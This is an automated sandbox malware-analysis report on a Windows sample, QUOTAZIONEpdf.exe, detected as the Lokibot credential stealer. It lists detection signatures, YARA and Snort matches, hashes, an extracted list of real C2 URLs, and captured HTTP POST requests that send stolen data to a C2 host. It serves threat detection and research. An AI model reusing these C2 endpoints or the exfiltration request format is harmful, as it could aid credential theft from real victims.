Windows Analysis Report QUOTAZIONEpdf.exe

Overview

General Information

Sample Name: QUOTAZIONEpdf.exe
Analysis ID: 553085
MD5: 23b85c2f43b23b57411e4f4366a10b25
SHA1: 1511bfee72f99f691c93a1e6b070724890c6aea8
SHA256: 9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign process
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file name differs from the original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • QUOTAZIONEpdf.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
    • QUOTAZIONEpdf.exe (PID: 808 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp; Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}
Antivirus detection for URL or domain
Source: http://slimpackage.com/slimmain/five/fre.php; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: slimpackage.com; Virustotal: Detection: 5%
Source: http://slimpackage.com/slimmain/five/fre.php; Virustotal: Detection: 8%
Machine Learning detection for sample
Source: QUOTAZIONEpdf.exe; Joe Sandbox ML: detected
Source: 2.0.QUOTAZIONEpdf.exe.400000.0.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: QUOTAZIONEpdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: 1_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: 1_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe; Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 104.223.93.105:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 104.223.93.105:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 104.223.93.105:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor; URLs: http://slimpackage.com/slimmain/five/fre.php
Source: Joe Sandbox View; ASN Name: ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View; IP Address: 104.223.93.105
Source: global traffic; HTTP traffic detected:
  POST /slimmain/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: slimpackage.com
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: CC3B1AE
  Content-Length: 190
  Connection: close
Source: global traffic; HTTP traffic detected:
  POST /slimmain/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: slimpackage.com
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: CC3B1AE
  Content-Length: 163
  Connection: close
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 14 Jan 2022 08:52:37 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
            Data Ascii: File not found.
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 14 Jan 2022 08:52:39 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
            Data Ascii: File not found.
          Source: QUOTAZIONEpdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: QUOTAZIONEpdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp | String found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
          Source: QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
          Source: unknown | HTTP traffic detected:
            POST /slimmain/five/fre.php HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: slimpackage.com
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: CC3B1AE
            Content-Length: 190
            Connection: close
          Source: unknown | DNS traffic detected: queries for: slimpackage.com
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 2_2_00404ED4 recv,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe | Code function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload | Author: kevoreilly
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
          Source: QUOTAZIONEpdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
